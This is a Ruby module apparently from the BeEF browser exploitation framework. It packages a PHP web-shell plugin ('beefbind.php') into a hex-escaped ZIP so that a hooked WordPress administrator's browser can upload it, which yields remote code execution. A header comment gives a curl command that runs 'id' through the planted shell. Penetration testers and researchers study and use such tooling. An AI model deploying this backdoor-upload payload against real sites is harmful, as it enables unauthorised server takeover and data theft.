50 lines
1.6 KiB
Ruby
50 lines
1.6 KiB
Ruby
#
|
|
# Copyright (c) Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
# This is a rewrite of the original module misc/wordpress_post_auth_rce.
|
|
#
|
|
# Original Author: Bart Leppens
|
|
# Rewritten by Erwan LR (@erwan_lr | WPScanTeam)
|
|
#
|
|
# To be executed, the request needs a BEEF header with the value of the auth_key option, example:
|
|
# curl -H 'BEEF: c9c3a2dcff54c5e2' -X POST --data 'cmd=id' http://wp.lab/wp-content/plugins/beefbind/beefbind.php
|
|
#
|
|
|
|
require 'digest/sha1'
|
|
require_relative '../wordpress_command'
|
|
|
|
class Wordpress_upload_rce_plugin < WordPressCommand
|
|
# Generate the plugin ZIP file as string. The method is called in the command.js.
|
|
# This allows easy modification of the beefbind.php to suit the needs, as well as being automatically generated
|
|
# even when the module is used with automated rules
|
|
def self.generate_zip_payload(auth_key)
|
|
stringio = Zip::OutputStream::write_buffer do |zio|
|
|
zio.put_next_entry("beefbind.php")
|
|
|
|
file_content = File.read(File.join(File.dirname(__FILE__), 'beefbind.php')).to_s
|
|
file_content.gsub!(/#SHA1HASH#/, Digest::SHA1.hexdigest(auth_key))
|
|
|
|
zio.write(file_content)
|
|
end
|
|
|
|
stringio.rewind
|
|
|
|
payload = stringio.sysread
|
|
escaped_payload = ''
|
|
|
|
# Escape payload to be able to put it in the JS
|
|
payload.each_byte do |byte|
|
|
escaped_payload << "\\" + ("x%02X" % byte)
|
|
end
|
|
|
|
escaped_payload
|
|
end
|
|
|
|
def self.options
|
|
super() + [
|
|
{ 'name' => 'auth_key', 'ui_label' => 'Auth Key', 'value' => SecureRandom.hex(8) }
|
|
]
|
|
end
|
|
end
|